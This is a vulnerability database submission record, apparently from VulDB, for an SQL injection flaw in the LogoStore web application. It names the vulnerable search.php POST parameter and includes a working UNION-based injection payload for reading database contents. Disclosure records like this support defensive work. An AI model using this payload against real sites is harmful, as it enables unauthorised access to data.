提出 #18: LogoStore - SQL Injection情報

タイトルLogoStore - SQL Injection
説明Introduction Exploit Title: LogoStore - SQL Injection Date: 27.01.2017 Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630 Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others logos and sell your own! Type of vulnerability: An SQL Injection vulnerability in LogoStore allows attackers to read arbitrary data from the database. Vulnerable URL : http://locahost/LogoStore/search.php Mehod : POST Parameter : query Simple Payload: Type: UNION query Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=
ユーザー
 KAAN KAMIS (UID 213)
送信2017年02月01日 12:27 (9 年 ago)
モデレーション2017年02月03日 23:15 (2 days later)
ステータス承諾済み
VulDBエントリ96540 [LogoStore /LogoStore/search.php クエリ SQLインジェクション]
ポイント17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!